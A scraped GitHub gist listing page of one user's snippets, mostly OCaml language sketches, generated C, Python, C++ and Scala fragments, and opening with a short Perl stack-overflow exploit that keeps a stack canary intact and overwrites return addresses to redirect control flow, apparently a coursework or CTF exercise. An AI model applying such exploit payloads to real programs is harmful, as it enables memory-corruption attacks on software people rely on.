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ramntry /
Created February 20, 2014 20:38
Some binary exploit :)
#!/usr/bin/env perl
print "a" x 32; # fill some buffer gap
print "Z"."\x45\x8b\x6b"; # save the canary unchanged but use a temporary byte instead zero-byte to prolong c-string in memory
print "b" x 12; # fill some another gap
print "\x5b\x85\x04\x08"; # override the func_A() return address from main() body to func_B() beginning
print "\xd3\x94\xe1\xf7"; # write the func_B() return address equal to main() one
print "\n"; # return from first gets() call and wait for another one
print "c" x 32; # replace the temporary byte denoting zero-byte within canary with real zero
ramntry /
Last active August 29, 2015 13:56
SLL representation sketch
type ident = string
type pattern = { pname : ident; pargs : ident list; }
type expr =
| Var of ident
| Ctr of ident * expr list
| FCall of ident * expr list
| GCall of ident * expr list
type gdef = {
gname : ident;
ramntry /
Created February 28, 2014 16:57
SLL Arithmetic
type ident = string
type pattern = { pname : ident; pargs : ident list; }
type expr =
| Var of ident
| Ctr of ident * expr list
| FCall of ident * expr list
| GCall of ident * expr list
type gdef = {
gname : ident;
ramntry / dbg.asm
Last active August 29, 2015 13:57
model tiny
org 100h
fm_aligned = (offset free_memory - _ + 100h + 15) / 16 * 16
load_address = fm_aligned + 100h
start: call get_fname
ramntry / sll_bs
Created March 10, 2014 17:20
sll_bs -- Bootstrapping environment for SLL project (OCaml/Camlp5/Ostap)
# sll_bs -- Bootstrapping environment for SLL project (OCaml/Camlp5/Ostap)
# Usage: ./sll_bs
# Author: Roman Tereshin <>
# Created: 2014-03-10
ramntry / mul.c
Created March 12, 2014 21:22
Autogenerated C for multiplication function in SLL
Object mul_(Object ctr, Object y_) {
Object result = NULL;
switch (SLL_get_ctr_id(ctr[0])) {
case N_: {
Object const gcall_mul = mul_((Object)ctr[1], y_);
Object const gcall_neg = neg_(gcall_mul);
result = gcall_neg;
} case S_: {
Object const gcall_mul_1 = mul_((Object)ctr[1], y_);
ramntry /
Last active August 29, 2015 13:57
Searching of test for the problem "Japanese computer" by genetic algorithm
#!/usr/bin/env python
# -- Searching of test for the problem "Japanese computer" by genetic algorithm
# Usage: ./ ./executable_file
# Author: Roman Tereshin <>
# Created: 2014-03-19
import os
import sys
import time
#include <algorithm>
#include <iostream>
#include <iterator>
#include <string>
#include <vector>
struct Employer {
std::string firstname;
std::string lastname;
double age;
object IdentParser {
def parse[S <: { def getIdent(): String }](stream: S) = {
val ident = stream.getIdent()
println("IdentParser got ident `" + ident + "'")
object ConstParser {
def parse[S <: { def getConst(): String }](stream: S) = {
ramntry /
Created April 3, 2014 19:48
Polymorphic variants expansion power example
type 'e expr = [
| `Var of string
| `Ctr of string * 'e list
let string_of_expr string_of_e = function
| `Var vname -> vname
| `Ctr (cname, args) ->
cname ^ "(" ^ String.concat ", " ( string_of_e args) ^ ")"